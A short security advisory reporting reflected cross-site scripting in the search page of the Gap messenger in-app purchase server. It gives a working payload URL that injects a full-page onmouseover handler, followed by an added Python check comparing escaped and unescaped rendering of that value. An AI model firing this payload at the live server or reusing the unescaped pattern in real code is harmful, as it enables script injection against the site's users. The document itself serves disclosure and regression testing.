The Gap messenger mobile application has an in-app purchase function. This function uses the "https://market.gapafzar.com" server.
A remote attacker can inject a malicious script and exploit both the server and the client side.
Payload:
https://market.gapafzar.com/page/search_service/academic?q=tt6v8%27onmouseover%3d%27alert(%22Ali%20Abdollahi%22)%27style%3d%27position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%27xkhsl
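The following check is an added example, not part of the original advisory and not the vendor's code: it decodes the `q` value from the URL above, places it in a single-quoted attribute, and compares the attributes a parser sees with and without output encoding. The `TEMPLATE` markup and all function names are assumptions made for illustration; the advisory does not show the server's actual markup.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# URL exactly as reported in the advisory.
REPORTED_URL = (
    "https://market.gapafzar.com/page/search_service/academic?q=tt6v8%27"
    "onmouseover%3d%27alert(%22Ali%20Abdollahi%22)%27style%3d%27position"
    "%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0"
    "%3b%27xkhsl"
)

# Assumption (hypothetical markup): q is echoed into a single-quoted attribute.
TEMPLATE = "<input type='text' name='q' value='{}'>"


class _FirstTagAttrs(HTMLParser):
    """Records the attributes of the first start tag in the markup."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if self.attrs is None:
            self.attrs = dict(attrs)


def reported_query(url=REPORTED_URL):
    """Return the URL-decoded value of the q parameter."""
    return parse_qs(urlsplit(url).query)["q"][0]


def render_unsafe(q):
    """Reflect q verbatim: a quote in q closes the value attribute."""
    return TEMPLATE.format(q)


def render_escaped(q):
    """Reflect q with HTML attribute encoding (' and " included)."""
    return TEMPLATE.format(escape(q, quote=True))


def attributes(markup):
    """Parse markup and return the first tag's attributes as a dict."""
    parser = _FirstTagAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs


if __name__ == "__main__":
    q = reported_query()
    print("unescaped:", sorted(attributes(render_unsafe(q))))
    print("escaped:  ", sorted(attributes(render_escaped(q))))
```

The same comparison works as a regression test for the fixed search page: any attribute beyond the ones the template declares means the value was reflected without encoding.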